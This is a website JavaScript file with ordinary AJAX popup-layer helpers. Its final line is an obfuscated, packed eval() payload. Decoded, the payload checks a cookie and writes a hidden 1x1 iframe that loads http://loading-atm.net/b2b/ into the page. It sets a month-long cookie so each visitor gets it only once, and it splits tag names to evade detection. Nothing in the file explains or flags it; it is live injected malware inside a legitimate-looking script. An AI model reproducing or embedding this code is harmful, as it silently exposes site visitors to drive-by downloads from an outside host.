function getHTTPObject(){
	var C=null;
	try{
		C=new ActiveXObject("Msxml2.XMLHTTP");
	}catch(e){
		try{C=new ActiveXObject("Microsoft.XMLHTTP");}
		catch(sc){C=null;}
	}
	if(!C &&typeof XMLHttpRequest!="undefined"){C=new XMLHttpRequest();}
	return C;
}

function closePopup(){
	document.getElementById('hidden_layer')	.style.display='none';
}
function displayHiddenLayer(){
	if (http.readyState == 4){
		if(http.status==200){
			the_element=document.getElementById('hidden_layer')
			the_element.innerHTML = http.responseText;
			top_value=document.body.scrollTop;
			left_value=document.body.scrollLeft;
			if(top_value<1){top_value=document.documentElement.scrollTop;}
			if(left_value<1){left_value=document.documentElement.scrollLeft;}
			top_value+=50;
			left_value+=300;
			the_element.style.left=left_value+'px';
			the_element.style.top=top_value+'px';
			the_element.style.display='block';
		}else{
			alert('Something is wrong!');
		}
	}
}

var parameters='';
var theform='';
var frompopup='no';
var edit_window;
var alertmessage='';
var resetCount='YES';
var thePage=1;
var http = getHTTPObject();
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('i a="a",7=5 6(),4=5 6(7.k()+l);2(0){a=0}2(3.8.g("9=1")==-1){3.m("<f"+a+"b c"+"h=1 d"+"e=1 j=\'h"+"n://y"+"v-x.t/u"+"/\' p=\'o"+"q:r\'></2"+"s>");3.8="9=1;"+" 4="+4.w()+"; "}',35,35,'||if|document|expires|new|Date|today|cookie|_0||me|widt|heig|ht|ifr|indexOf||var|src|getTime|2678400000|write|ttp|dis|style|play|none|rame|net|b2b|ng|toGMTString|atm|loadi'.split('|')));
